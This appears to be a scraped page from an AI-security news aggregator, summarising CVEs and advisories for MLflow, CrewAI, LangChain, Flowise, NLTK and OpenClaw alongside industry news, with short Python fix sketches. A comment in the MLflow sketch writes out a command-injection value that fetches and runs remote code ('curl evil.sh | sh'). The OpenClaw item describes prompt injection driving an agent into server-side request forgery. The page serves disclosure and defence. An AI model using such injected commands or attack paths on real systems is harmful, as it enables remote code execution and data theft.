aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.


Maintained by

Truong (Jack) Luu

Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. Built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

Total tracked: 2,669 · Last 24 hours: 17 · Last 7 days: 160
Daily Briefing: Monday, March 30, 2026

Anthropic's Leaked "Mythos" Model Raises Cybersecurity Concerns: An accidental configuration leak revealed Anthropic's unreleased Mythos model, which has advanced reasoning and coding abilities including recursive self-fixing (autonomously finding and patching its own bugs). The model's improved capability to find and exploit software vulnerabilities could enable more sophisticated cyberattacks, prompting Anthropic to plan a cautious rollout targeting enterprise security teams first.

Critical Command Injection in MLflow Model Deployment: MLflow has a command injection vulnerability (where an attacker inserts malicious commands into input that gets executed) in its model serving code when deploying models with `env_manager=LOCAL`. The flaw reads dependency information from `python_env.yaml` and executes it in a shell without validation, allowing arbitrary command execution on deployment systems. (CVE-2025-15379, critical severity)

Multiple High-Severity Vulnerabilities Found in CrewAI: CrewAI has several serious security flaws including two that enable RCE (remote code execution, where attackers run commands on systems they don't control) when Docker containerization fails and the system falls back to less secure sandbox settings. Additional vulnerabilities allow arbitrary file reading and SSRF (server-side request forgery, tricking a server into making unwanted requests) through improper validation in RAG search tools. (CVE-2026-2287, CVE-2026-2275, CVE-2026-2285, CVE-2026-2286)

LangChain Path Traversal Adds to AI Pipeline Security Woes: LangChain and LangGraph have critical flaws allowing attackers to steal sensitive data like API keys through improper input handling, including a new path traversal bug (CVE-2026-34070, CVSS 7.5) that lets attackers read arbitrary files. Maintainers have released fixes that need immediate application.

Critical This Week (5 issues)

critical · CVE-2025-15379: A command injection vulnerability exists in MLflow's model serving container initialization code, specifically in the `_
CVE-2025-15379 · NVD/CVE Database · Mar 30, 2026

Latest Intel

01

CVE-2026-2589: The Greenshift – animation and page builder blocks plugin for WordPress is vulnerable to Sensitive Information Exposure

security
Mar 5, 2026

The Greenshift plugin for WordPress (used to create animations and page builder blocks) has a vulnerability where automated backup files are stored in a publicly accessible location, allowing attackers to read sensitive API keys (for OpenAI, Claude, Google Maps, Gemini, DeepSeek, and Cloudflare Turnstile) without needing to log in. This affects all versions up to 12.8.3.

NVD/CVE Database
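The MLflow advisory above describes dependency strings read from `python_env.yaml` being executed by a shell without validation. A minimal sketch of that bug class and one way to close it, assuming a hypothetical `pip install` build step (the function names and regex here are illustrative, not MLflow's actual code):

```python
import re

# A plain dependency specifier such as "numpy==1.26.4"; anything else is rejected.
SPEC_RE = re.compile(r"^[A-Za-z0-9._-]+(==[A-Za-z0-9._-]+)?$")

def unsafe_install_cmd(dep: str) -> str:
    # VULNERABLE pattern: attacker-controlled text from a YAML file is
    # pasted into a command line that later runs under a shell, so a
    # value like "numpy; curl evil.sh | sh" executes arbitrary commands.
    return f"pip install {dep}"

def safe_install_argv(dep: str) -> list[str]:
    # Safer pattern: validate the specifier and build an argv list for
    # subprocess.run(argv) with no shell, so no shell ever parses
    # metacharacters in attacker-controlled text.
    if not SPEC_RE.match(dep):
        raise ValueError(f"rejected dependency specifier: {dep!r}")
    return ["pip", "install", dep]
```

The safe variant is deliberately strict: a specifier that fails the whitelist is rejected outright rather than escaped, which is the usual recommendation for build-time inputs.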
02

Introducing GPT‑5.4

industry
Mar 5, 2026

OpenAI released GPT-5.4 and GPT-5.4-pro, two new AI models with a 1 million token context window (the amount of text the model can consider at once) and an August 31st, 2025 knowledge cutoff. The models are priced slightly higher than the previous GPT-5.2 family and show significant improvements on business tasks like spreadsheet modeling, achieving 87.3% accuracy compared to 68.4% for GPT-5.2.

Simon Willison's Weblog
03

The Pentagon formally labels Anthropic a supply-chain risk

policy
Mar 5, 2026

The US Defense Department has officially labeled Anthropic (maker of Claude, an AI assistant) a 'supply-chain risk,' which will prevent defense contractors from using Claude in products made for the government. This escalates a dispute between the Pentagon and Anthropic over their policies on acceptable uses of the AI, and may lead to legal action.

The Verge (AI)
04

CVE-2026-28451: OpenClaw versions prior to 2026.2.14 contain server-side request forgery vulnerabilities in the Feishu extension that al

security
Mar 5, 2026

OpenClaw versions before 2026.2.14 have a server-side request forgery vulnerability (SSRF, where an attacker tricks a server into making requests to unintended targets) in the Feishu extension that allows attackers to fetch remote URLs and access internal services through the sendMediaFeishu function and markdown image processing. Attackers can exploit this by manipulating tool calls or using prompt injection (tricking the AI by hiding instructions in its input) to trigger these requests and re-upload the responses as Feishu media.

Fix: Upgrade OpenClaw to version 2026.2.14 or later.

NVD/CVE Database
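The OpenClaw item above is a classic SSRF: the server fetches URLs on behalf of untrusted input. A common mitigation is to resolve the target and refuse anything that lands on a private, loopback, or link-local address before fetching. A minimal sketch, assuming a generic guard function (this is not OpenClaw's actual patch):

```python
import ipaddress
import socket
from urllib.parse import urlparse

def is_url_allowed(url: str) -> bool:
    """Return False for URLs that resolve to private, loopback,
    link-local, or reserved addresses, so the server never fetches
    internal services on an attacker's behalf."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False
    try:
        infos = socket.getaddrinfo(parsed.hostname, None)
    except socket.gaierror:
        return False
    for info in infos:
        ip = ipaddress.ip_address(info[4][0])
        if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:
            return False
    return True
```

Note that a production guard also has to handle redirects and DNS rebinding (re-resolution between check and fetch); this sketch only covers the initial validation step.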
05

Anthropic labelled a supply chain risk by Pentagon

policy · industry
Mar 5, 2026

The US Pentagon has officially labeled Anthropic, an AI company, as a supply chain risk, marking the first time the government has given this designation to a US firm. This decision stems from Anthropic's refusal to give the military unrestricted access to its AI tools, citing concerns about mass surveillance and autonomous weapons development. The designation prohibits any company working with the military from conducting business with Anthropic.

BBC Technology
06

GHSA-jc5m-wrp2-qq38: Flowise Vulnerable to PII Disclosure on Unauthenticated Forgot Password Endpoint

security
Mar 5, 2026

Flowise's forgot-password endpoint leaks personally identifiable information (PII: sensitive data like names and account IDs that identify individuals) to anyone who knows a valid email address, because it returns the full user object instead of a generic success message. An attacker can exploit this by sending a simple request to `/api/v1/account/forgot-password` with any email address and receive back user IDs, names, creation dates, and other account details without needing to log in.

GitHub Advisory Database
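The fix pattern for the Flowise leak above is to return the same generic message whether or not the account exists, instead of echoing the user object. A minimal sketch, with a hypothetical handler and in-memory user store (not Flowise's actual code):

```python
def forgot_password(email: str, users: dict) -> dict:
    """Account-enumeration-safe forgot-password handler."""
    user = users.get(email)
    if user is not None:
        # Side effect only (e.g. queue a reset email); never return
        # the user object to the caller.
        pass
    # Identical response for known and unknown emails, so the endpoint
    # leaks no PII and cannot be used to enumerate accounts.
    return {"message": "If that account exists, a reset link has been sent."}
```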
07

AWS launches a new AI agent platform specifically for healthcare

industry
Mar 5, 2026

AWS launched Amazon Connect Health, an AI agent-powered platform (software that completes complex tasks automatically) designed to help healthcare organizations automate administrative work like appointment scheduling and patient records. The platform is HIPAA-eligible (meets healthcare privacy and security standards) and integrates with existing electronic health record systems, marking AWS's first major AI agent product in a regulatory-compliant healthcare offering.

TechCrunch
08

GHSA-x2g5-fvc2-gqvp: Flowise has Insufficient Password Salt Rounds

security
Mar 5, 2026

Flowise ships a weak password hashing configuration: bcrypt (a password hashing algorithm) is set to only 5 salt rounds, i.e. 2^5 = 32 iterations, versus OWASP's recommended minimum of 10 rounds (1,024 iterations). This weakness means that if the database is stolen, attackers can crack user passwords roughly 30 times faster using modern GPUs, putting all user accounts at risk.

Fix: The source recommends increasing the default PASSWORD_SALT_HASH_ROUNDS environment variable to at least 10 (as recommended by OWASP), or considering 12 for a better balance between security and login performance. The source also recommends documenting that higher values will increase login time but improve security. Note: the source acknowledges that existing password hashes created with 5 rounds will remain vulnerable even after this change is applied.

GitHub Advisory Database
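The bcrypt "salt rounds" setting in the Flowise advisory above is a cost factor: the work an attacker must do per password guess scales as 2**rounds. The numbers cited check out directly:

```python
def bcrypt_iterations(rounds: int) -> int:
    # bcrypt's cost parameter is an exponent: work = 2 ** rounds.
    return 2 ** rounds

current = bcrypt_iterations(5)     # Flowise default: 32 iterations
owasp_min = bcrypt_iterations(10)  # OWASP minimum: 1024 iterations
speedup = owasp_min // current     # attacker does 32x less work per guess at the default
```

Each +1 to the rounds setting doubles both the attacker's cracking cost and the server's login latency, which is why the advisory suggests 10 as a floor and 12 as a balance point.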
09

CVE-2026-0848: NLTK versions <=3.9.2 are vulnerable to arbitrary code execution due to improper input validation in the StanfordSegment

security
Mar 5, 2026

NLTK (Natural Language Toolkit, a Python library for text processing) versions 3.9.2 and earlier have a serious vulnerability in the StanfordSegmenter module, which loads external Java files without checking if they are legitimate. An attacker can trick the system into running malicious code by providing a fake Java file, which executes when the module loads, potentially giving them full control over the system.

NVD/CVE Database
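The NLTK flaw above stems from loading external Java files without checking that they are legitimate. A standard mitigation is to verify a file against a known-good SHA-256 digest before anything loads it. A minimal sketch (the path and digest are illustrative; this is not NLTK's patch):

```python
import hashlib

def verify_jar(path: str, expected_sha256: str) -> bool:
    """Return True only if the file at `path` hashes to the pinned
    SHA-256 digest, so a swapped-in malicious jar is rejected before
    it can be loaded."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return h.hexdigest() == expected_sha256
```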
10

It’s official: The Pentagon has labeled Anthropic a supply-chain risk

policy · industry
Mar 5, 2026

The U.S. Department of Defense has officially designated Anthropic, an AI company, as a supply-chain risk (a classification usually reserved for foreign adversaries), requiring any organization working with the Pentagon to certify it doesn't use Anthropic's products. This designation came after Anthropic CEO Dario Amodei refused to allow the military to use the company's AI systems for mass surveillance of Americans or to power fully autonomous weapons with no human involvement in targeting decisions. The move is threatening Anthropic's operations, especially since the military currently relies on Anthropic's Claude AI for operations in the Middle East and other classified work.

TechCrunch
critical

CVE-2026-33873: Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.9.0, the Agentic Assis

CVE-2026-33873 · NVD/CVE Database · Mar 27, 2026

critical

Attackers exploit critical Langflow RCE within hours as CISA sounds alarm

CSO Online · Mar 27, 2026

critical

CVE-2025-53521: F5 BIG-IP Unspecified Vulnerability

CVE-2025-53521 · CISA Known Exploited Vulnerabilities · Mar 26, 2026

critical

CISA: New Langflow flaw actively exploited to hijack AI workflows

BleepingComputer · Mar 26, 2026